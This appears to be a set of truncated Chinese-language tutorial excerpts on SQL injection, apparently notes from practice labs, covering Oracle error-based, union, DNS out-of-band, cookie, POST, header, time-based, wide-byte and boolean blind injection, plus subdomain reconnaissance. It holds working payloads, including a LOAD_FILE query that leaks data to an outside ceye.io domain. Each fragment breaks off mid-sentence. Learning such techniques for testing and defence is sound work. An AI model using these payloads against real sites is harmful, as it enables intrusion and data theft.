Oracle注入首先是Oracle数据库的注入Dual Oracle中的系统表rownum=1  与limit相似and table name<> 'ADMIN' 理解为排除某个表或者字段使用ctxsys.drithsx.sn注入数据库：1=ctxsys.drithsx.sn(1,(select user from dual))--+数据库 BATTLE01表

刚开始拿到这个站有点蒙输入1' 就直接返回首页了然后加入and 1=1 没有报错 则这是一个注入点  没有限制and那么接下来就是我们大显身手的时候了order by 2  正常order by 3 错误有两个字段and 1=2 union select 1,2主要靠2来爆出信息and 1=2 union select 1,database()maosheand 1=2

DNS注入前提条件1.ip被网站限制2.发现疑似漏洞，目标站点不明显3.目标信息显示不出来满足以上其中一条都可以进行DNS注入网址http://ceye.io必须要配置的地方主要是利用SELECT LOAD_FILE(CONCAT('\\\\',(sql语句来进行自己想做的操作),'.自己的域名.ceye.io\\abc'));来进行注入的其实理论还是不咋

Access注入 — Cookie注入document.cookie:表示当前浏览器中的cookie变量alert（）:表示弹出一个对话框，在该对话框中单击“确定”按钮确认信息。escape():该函数用于对字符串进行编码。cookie注入的原理在于更改本地的cookie，从而利用cookie来提交非法语句。cookie注入原理Accsess注入--偏移注入javascript:alert(doc

信息搜集分为5个--1.前端 2.后端 3.中间件 4.网络架构 5.系统网络架构域名顶级域名：.com（商） .edu（教） .gov（政-别碰(#^.^#)）一级域名：liying.com二级域名：ke.liying.com三级域名：sd.ke.liying.com有几个点就事几级域名如何收集子域名Layer子域名挖掘机dnsenumwho is用来查询ip及所有者信息用什么来查询whois.

POST注入可以用sqlmap -u 'url' --form也可以直接在表单中直接注入Post注入Rank 1首先在用户名和密码--admin（其实不用知道用户的账号信息）Your Login name:admin Your Password:admin可以用1' or 1=1（以前的外能密码）1' union select 1,2#Your Login name

head注入》显错注入Host：请求的主机名，允许多个域名同处一个IP地址，即虚拟主机User-Agent：发送请求的浏览器类型、操作系统等信息Referer  是  HTTP  请求header 的一部分，当浏览器（或者模拟浏览器行为）向web 服务器发送请求的时候，头信息里有包含  Refere

延时注入：其实和布尔注入差不多，都是利用sql是否报错，或数据是否显示来判断的用到的函数:if(条件判断,false输出,true输出)sleep(几秒) 让程序延迟几秒+substr(字符串,开始0,结束) 截取ascii(符号) 将符号转化为ascii码延时注入Rank 1?id=1时 显示 You are in........... 为真?id=1'时 不显示  为假&nb

宽字节注入的前提（利用GBK的特性在url上加入%df%27来使转义失去其意义）  1.使用php的函数addslashes或是开启GPC或者icov  2.数据库的编码必须为GBK--小众化的错误%df%27会转化为%df%5c%27根据gbk编码，第一个字节ascii码大于128（两个字节是一个汉字）闯关宽字节注入Rank 1?id=1时 Your sql statemen

盲注--布尔盲注（利用返回信息的正确与错误来拿到你所想得到的东西--数据库-表-字段）首先拿到一个网站，先判断注入点在其后面加入?id=1'报错--判断出其使用的数据库为mysql数据库加入?id=1' and 1=1 --+  和 ?id=1' and 1=2 --+ 时分别显示You are in..........  和  空--判断出可